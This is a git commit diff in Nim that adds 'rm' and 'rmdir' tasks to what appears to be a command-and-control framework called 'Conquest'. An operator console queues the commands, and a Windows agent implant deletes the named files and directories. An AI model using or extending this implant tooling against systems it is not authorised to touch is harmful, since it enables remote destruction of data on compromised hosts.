Implemented 'rm' and 'rmdir' commands
This commit is contained in:
@@ -203,6 +203,58 @@ proc taskDir*(task: Task): TaskResult =
|
|||||||
status: Completed
|
status: Completed
|
||||||
)
|
)
|
||||||
|
|
||||||
|
except CatchableError as err:
|
||||||
|
return TaskResult(
|
||||||
|
task: task.id,
|
||||||
|
agent: task.agent,
|
||||||
|
data: encode(fmt"An error occured: {err.msg}" & "\n"),
|
||||||
|
status: Failed
|
||||||
|
)
|
||||||
|
|
||||||
|
# Remove file
|
||||||
|
proc taskRm*(task: Task): TaskResult =
|
||||||
|
|
||||||
|
let target = task.args.join(" ").replace("\"", "").replace("'", "")
|
||||||
|
echo fmt"Deleting {target}."
|
||||||
|
|
||||||
|
try:
|
||||||
|
# Get current working directory using GetCurrentDirectory
|
||||||
|
if DeleteFile(target) == FALSE:
|
||||||
|
raise newException(OSError, fmt"Failed to delete file ({GetLastError()}).")
|
||||||
|
|
||||||
|
return TaskResult(
|
||||||
|
task: task.id,
|
||||||
|
agent: task.agent,
|
||||||
|
data: encode(""),
|
||||||
|
status: Completed
|
||||||
|
)
|
||||||
|
|
||||||
|
except CatchableError as err:
|
||||||
|
return TaskResult(
|
||||||
|
task: task.id,
|
||||||
|
agent: task.agent,
|
||||||
|
data: encode(fmt"An error occured: {err.msg}" & "\n"),
|
||||||
|
status: Failed
|
||||||
|
)
|
||||||
|
|
||||||
|
# Remove directory
|
||||||
|
proc taskRmdir*(task: Task): TaskResult =
|
||||||
|
|
||||||
|
let target = task.args.join(" ").replace("\"", "").replace("'", "")
|
||||||
|
echo fmt"Deleting {target}."
|
||||||
|
|
||||||
|
try:
|
||||||
|
# Get current working directory using GetCurrentDirectory
|
||||||
|
if RemoveDirectoryA(target) == FALSE:
|
||||||
|
raise newException(OSError, fmt"Failed to delete directory ({GetLastError()}).")
|
||||||
|
|
||||||
|
return TaskResult(
|
||||||
|
task: task.id,
|
||||||
|
agent: task.agent,
|
||||||
|
data: encode(""),
|
||||||
|
status: Completed
|
||||||
|
)
|
||||||
|
|
||||||
except CatchableError as err:
|
except CatchableError as err:
|
||||||
return TaskResult(
|
return TaskResult(
|
||||||
task: task.id,
|
task: task.id,
|
||||||
|
|||||||
@@ -38,6 +38,16 @@ proc handleTask*(task: Task, config: AgentConfig): TaskResult =
|
|||||||
echo taskResult.data
|
echo taskResult.data
|
||||||
return taskResult
|
return taskResult
|
||||||
|
|
||||||
|
of RemoveFile:
|
||||||
|
let taskResult = taskRm(task)
|
||||||
|
echo taskResult.data
|
||||||
|
return taskResult
|
||||||
|
|
||||||
|
of RemoveDirectory:
|
||||||
|
let taskResult = taskRmdir(task)
|
||||||
|
echo taskResult.data
|
||||||
|
return taskResult
|
||||||
|
|
||||||
else:
|
else:
|
||||||
echo "Not implemented"
|
echo "Not implemented"
|
||||||
return nil
|
return nil
|
||||||
@@ -52,3 +52,36 @@ proc taskListDirectory*(cq: Conquest, arguments: seq[string]) =
|
|||||||
|
|
||||||
cq.writeLine(fgBlack, styleBright, fmt"[{date}] [*] ", resetStyle, fmt"Tasked agent to list files and directories.")
|
cq.writeLine(fgBlack, styleBright, fmt"[{date}] [*] ", resetStyle, fmt"Tasked agent to list files and directories.")
|
||||||
|
|
||||||
|
proc taskRemoveFile*(cq: Conquest, arguments: seq[string]) =
|
||||||
|
|
||||||
|
# Create a new task
|
||||||
|
let
|
||||||
|
date: string = now().format("dd-MM-yyyy HH:mm:ss")
|
||||||
|
task = Task(
|
||||||
|
id: generate(alphabet=join(toSeq('A'..'Z'), ""), size=8),
|
||||||
|
agent: cq.interactAgent.name,
|
||||||
|
command: RemoveFile,
|
||||||
|
args: arguments,
|
||||||
|
)
|
||||||
|
|
||||||
|
# Add new task to the agent's task queue
|
||||||
|
cq.interactAgent.tasks.add(task)
|
||||||
|
|
||||||
|
cq.writeLine(fgBlack, styleBright, fmt"[{date}] [*] ", resetStyle, fmt"Tasked agent to remove file.")
|
||||||
|
|
||||||
|
proc taskRemoveDirectory*(cq: Conquest, arguments: seq[string]) =
|
||||||
|
|
||||||
|
# Create a new task
|
||||||
|
let
|
||||||
|
date: string = now().format("dd-MM-yyyy HH:mm:ss")
|
||||||
|
task = Task(
|
||||||
|
id: generate(alphabet=join(toSeq('A'..'Z'), ""), size=8),
|
||||||
|
agent: cq.interactAgent.name,
|
||||||
|
command: RemoveDirectory,
|
||||||
|
args: arguments,
|
||||||
|
)
|
||||||
|
|
||||||
|
# Add new task to the agent's task queue
|
||||||
|
cq.interactAgent.tasks.add(task)
|
||||||
|
|
||||||
|
cq.writeLine(fgBlack, styleBright, fmt"[{date}] [*] ", resetStyle, fmt"Tasked agent to remove directory.")
|
||||||
|
|||||||
@@ -31,6 +31,14 @@ var parser = newParser:
|
|||||||
help("List files and directories.")
|
help("List files and directories.")
|
||||||
arg("directory", help="Relative or absolute path. Default: current working directory.", nargs = -1)
|
arg("directory", help="Relative or absolute path. Default: current working directory.", nargs = -1)
|
||||||
|
|
||||||
|
command("rm"):
|
||||||
|
help("Remove file.")
|
||||||
|
arg("file", help="Relative or absolute path to the file to delete.", nargs = -1)
|
||||||
|
|
||||||
|
command("rmdir"):
|
||||||
|
help("Remove directory.")
|
||||||
|
arg("directory", help="Relative or absolute path to the directory to delete.", nargs = -1)
|
||||||
|
|
||||||
command("help"):
|
command("help"):
|
||||||
nohelpflag()
|
nohelpflag()
|
||||||
|
|
||||||
@@ -78,6 +86,12 @@ proc handleAgentCommand*(cq: Conquest, args: varargs[string]) =
|
|||||||
of "ls":
|
of "ls":
|
||||||
cq.taskListDirectory(opts.ls.get.directory)
|
cq.taskListDirectory(opts.ls.get.directory)
|
||||||
|
|
||||||
|
of "rm":
|
||||||
|
cq.taskRemoveFile(opts.rm.get.file)
|
||||||
|
|
||||||
|
of "rmdir":
|
||||||
|
cq.taskRemoveDirectory(opts.rmdir.get.directory)
|
||||||
|
|
||||||
# Handle help flag
|
# Handle help flag
|
||||||
except ShortCircuit as err:
|
except ShortCircuit as err:
|
||||||
if err.flag == "argparse_help":
|
if err.flag == "argparse_help":
|
||||||
|
|||||||
@@ -18,6 +18,8 @@ type
|
|||||||
GetWorkingDirectory = "pwd"
|
GetWorkingDirectory = "pwd"
|
||||||
SetWorkingDirectory = "cd"
|
SetWorkingDirectory = "cd"
|
||||||
ListDirectory = "ls"
|
ListDirectory = "ls"
|
||||||
|
RemoveFile = "rm"
|
||||||
|
RemoveDirectory = "rmdir"
|
||||||
|
|
||||||
TaskStatus* = enum
|
TaskStatus* = enum
|
||||||
Completed = "completed"
|
Completed = "completed"
|
||||||
|
|||||||
Reference in New Issue
Block a user